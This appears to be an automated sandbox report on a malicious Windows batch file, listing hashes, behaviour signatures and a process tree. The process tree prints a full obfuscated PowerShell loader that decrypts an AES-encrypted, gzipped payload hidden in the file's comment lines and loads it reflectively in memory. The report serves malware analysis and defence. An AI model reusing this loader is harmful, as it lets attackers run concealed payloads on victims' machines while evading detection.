3bbb6ef8a421ddc67f3fac409a9b6db12985f3dbd3e021e827323dbf12f1dd72

Analysis

max time kernel
45s
max time network
48s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
07-02-2023 20:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mal_system32.bat
Size

42KB
MD5

e04749b482f8553ca2447908985a58c2
SHA1

392a0876c7da6a322ae49d08036c5307c30ff506
SHA256

3bbb6ef8a421ddc67f3fac409a9b6db12985f3dbd3e021e827323dbf12f1dd72
SHA512

28fbcfb611906030b392d6df7cc84261ba54c50971515f9d3c52b103930f4a660a13f9b5f25f3722fc9837e85d14bab48f76e533720da506e65add9248a20da5
SSDEEP

768:iIQ2T2z5oo0KfzTUCcrf4RGYfXrX5+0Sk5MqE4qoJibB:nQP0KTUCaAR9z+oWB

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
900	mal_system32.bat.exe

Loads dropped DLL 1 IoCs

pid	Process
1996	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
900	mal_system32.bat.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	900	mal_system32.bat.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1996 wrote to memory of 900	1996	cmd.exe	28
PID 1996 wrote to memory of 900	1996	cmd.exe	28
PID 1996 wrote to memory of 900	1996	cmd.exe	28

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\mal_system32.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1996
- C:\Users\Admin\AppData\Local\Temp\mal_system32.bat.exe
  "mal_system32.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $zQwRM = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mal_system32.bat').Split([Environment]::NewLine);foreach ($OdFFU in $zQwRM) { if ($OdFFU.StartsWith(':: ')) { $uGBBl = $OdFFU.Substring(3); break; }; };$RNEcR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uGBBl);$Luxkv = New-Object System.Security.Cryptography.AesManaged;$Luxkv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Luxkv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Luxkv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cpRJRjmX+dQozGYRUYlw6+rZYr1ds71QG9Gr+iNdnb0=');$Luxkv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nbh/6SYQqIqqlnYv9GZTew==');$IaQgR = $Luxkv.CreateDecryptor();$RNEcR = $IaQgR.TransformFinalBlock($RNEcR, 0, $RNEcR.Length);$IaQgR.Dispose();$Luxkv.Dispose();$UQoIh = New-Object System.IO.MemoryStream(, $RNEcR);$RZpSQ = New-Object System.IO.MemoryStream;$yQYkB = New-Object System.IO.Compression.GZipStream($UQoIh, [IO.Compression.CompressionMode]::Decompress);$yQYkB.CopyTo($RZpSQ);$yQYkB.Dispose();$UQoIh.Dispose();$RZpSQ.Dispose();$RNEcR = $RZpSQ.ToArray();$RnWAm = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($RNEcR);$pVHiB = $RnWAm.EntryPoint;$pVHiB.Invoke($null, (, [string[]] ('')))
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:900

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\mal_system32.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
\Users\Admin\AppData\Local\Temp\mal_system32.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/900-55-0x0000000000000000-mapping.dmp

Download
memory/900-57-0x000007FEFBBF1000-0x000007FEFBBF3000-memory.dmp

Filesize
8KB

Download
memory/900-58-0x000007FEF3890000-0x000007FEF42B3000-memory.dmp

Filesize
10.1MB

Download
memory/900-60-0x00000000023E4000-0x00000000023E7000-memory.dmp

Filesize
12KB

Download
memory/900-59-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp

Filesize
11.4MB

Download
memory/900-61-0x00000000023E4000-0x00000000023E7000-memory.dmp

Filesize
12KB

Download
memory/900-62-0x00000000023EB000-0x000000000240A000-memory.dmp

Filesize
124KB

Download